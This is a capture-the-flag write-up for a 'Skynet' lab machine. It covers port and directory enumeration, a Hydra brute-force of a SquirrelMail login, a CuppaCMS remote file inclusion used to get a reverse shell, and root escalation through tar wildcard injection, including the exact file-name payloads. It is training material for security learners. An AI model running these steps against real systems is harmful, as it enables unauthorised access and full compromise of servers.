This room was good fun and involved a few different techniques to complete. There was a lot of enumeration and an interesting new technique I learned to escalate privileges.
I started the same way as always, by running a port scan on the server. This returned the following.
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 110/tcp open pop3 Dovecot pop3d 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 143/tcp open imap Dovecot imapd 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
I notice there is a web server and some Samba ports open, so I decide to investigate these further.
I run gobuster to see if I can find any hidden directories.
┌──(gareth㉿SRF239-L)-[~/Desktop/Files/Skynet] └─$ gobuster dir -u http://10.10.237.150 -w /usr/share/wordlists/dirb/common.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.237.150 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2021/01/09 05:01:22 Starting gobuster =============================================================== /.hta (Status: 403) /.htaccess (Status: 403) /.htpasswd (Status: 403) /admin (Status: 301) /config (Status: 301) /css (Status: 301) /index.html (Status: 200) /js (Status: 301) /server-status (Status: 403) /squirrelmail (Status: 301) =============================================================== 2021/01/09 05:01:46 Finished ===============================================================
/squirrelmail directories are the most interesting to me at this stage. I also decide to enumerate the samba server and see if I can find any open shares.
I ran the enum4linux.sh script against the server and it returned a lot of information. The most useful of which was the following:
============================== | Users on 10.10.237.150 | ============================== index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: milesdyson Name: Desc: user:[milesdyson] rid:[0x3e8] ========================================== | Share Enumeration on 10.10.237.150 | ========================================== Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers anonymous Disk Skynet Anonymous Share milesdyson Disk Miles Dyson Personal Share IPC$ IPC IPC Service (skynet server (Samba, Ubuntu)) [+] Attempting to map shares on 10.10.237.150 //10.10.237.150/print$ Mapping: DENIED, Listing: N/A //10.10.237.150/anonymous Mapping: OK, Listing: OK //10.10.237.150/milesdyson Mapping: DENIED, Listing: N/A //10.10.237.150/IPC$ [E] Can't understand response: NT_STATUS_OBJECT_NAME_NOT_FOUND listing \* ======================================================================== | Users on 10.10.237.150 via RID cycling (RIDS: 500-550,1000-1050) | ======================================================================== [I] Found new SID: S-1-22-1 [I] Found new SID: S-1-5-21-2393614426-3774336851-1116533619 [I] Found new SID: S-1-5-32 [+] Enumerating users using SID S-1-22-1 and logon username '', password '' S-1-22-1-1001 Unix User\milesdyson (Local User)
So I know there is a user on the system with the username
milesdyson, and there's an anonymous samba share I can connect to and explore. Upon exploration of this samba share I find a file called
log1.txt which appears to contain a list of terminator-related passwords.
So now I have a potential username and a list of what appears to be passwords. I use this list of passwords and try to login to the SquirrelMail instance at
Thanks to Hydra I am able to brute-force the login.
gareth@enso:~/Desktop/Files/Skynet$ hydra -l milesdyson -P ~/Desktop/Files/Skynet/log1.txt 10.10.196.150 http-form-post "/squirrelma il/src/redirect.php:login_username=^USER^&secretkey=^PASS^:Unknown" Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-11-07 00:29:21 [DATA] max 16 tasks per 1 server, overall 16 tasks, 31 login tries (l:1/p:31), ~2 tries per task [DATA] attacking http-post-form://10.10.196.150:80/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^:Unknown [http-post-form] host: 10.10.196.150 login: milesdyson password: <redacted> 1 of 1 target successfully completed, 1 valid password found
I was really glad this email login was not a dead-end. With this password, I was able to connect to the previously enumerated samba share
milesdyson. In this share, there was a text file which mentioned a directory I had not discovered.
After visiting the URL and enumerating it with gobuster, I discovered the administrator login URL, which revealed that this particular site was an instance of CuppaCMS. I had not heard of CuppaCMS before but I was certain there must exist some kind of vulnerability for it. I did a quick search using
searchsploit and discovered there is a Remote File Inclusion vulnerability, 25971.
To exploit this vulnerability I didn't even need to login, I can simply visit a URL which is hosting my reverse-shell PHP code, and then I have a shell on the server.
I set up a netcat listener on port 4444 and visited this address in my browser.
This works because of a line of code in
/alert/alertConfigField.php in the CuppaCMS which had the line
<?php include($_REQUEST["urlConfig"]); ?>. This will automatically execute the contents of whatever is found in the urlConfig variable value passed in by the GET request. In this instance, my reverse shell script.
After gaining shell access as the www-data user I was able to cat the user.txt file to get my first flag.
I now have a set of steps I undertake manually on any server after I gain shell access, before running automated enumeration tools like linpeas. This includes scanning for any binaries with the SUID bit set, checking which commands (if any) I can run as sudo, and checking to see whether or not there are any crontab scripts scheduled to run as the root user.
$ cat /etc/crontab SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command */1 * * * * root /home/milesdyson/backups/backup.sh 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
From checking the crontab file I discovered a script that runs every minute from inside the
/home/milesdyson/backups directory called
backup.sh. The contents of this backup.sh file revealed that it was taking a tar backup of the contents of the
/var/www/html directory. A directory which, as the www-data user, I can write to.
Exploiting tar with wildcard
$ cat /home/milesdyson/backups/backup.sh #!/bin/bash cd /var/www/html tar cf /home/milesdyson/backups/backup.tgz *
The interesting part here is that the script is using the * wildcard asterisk to tell the script to include every file in the directory. If this was not used, you would have to manually include the path of each file you wanted to include in the tar file, like so
tar cf /home/milesdyson/backups/backup.tgz /var/www/html/index.html /var/www/html/index.js ...
If you want to add any additional command-line arguments to the tar binary, you can also include those in amongst the filenames. Those begin with --.
It is, however, possible to create files that have a name beginning with – and get the tar binary to execute those as command-line arguments, rather than interpreting them as files to be zipped.
With that in mind, I created a bash script to grant the www-data user permission to run all commands as sudo without being prompted for a password and saved it as
I then created the following two files in the
/var/www/html directory. When creating files which begin with - you have to specify the absolute path or it will not work, hence the pwd command beforehand, which gets the present working directory.
$ touch $(pwd)/--checkpoint-action=exec=sh\ root.sh $ touch $(pwd)/--checkpoint=1
The tar documentation explains that the
--checkpoint command argument is to periodically execute arbitrary actions. That is just what we want to do.
I then waited one very long minute for the cronjob to execute.
Eventually, I was able to run
sudo -u root /bin/bash and
cat /root/root.txt to capture the remaining flag.
I really enjoyed this room as it felt like a somewhat realistic scenario that one might find on an actual server, with a few hoops to jump through to find the vulnerability to exploit. I also enjoyed learning about how to use the tar binary to gain privilege escalation.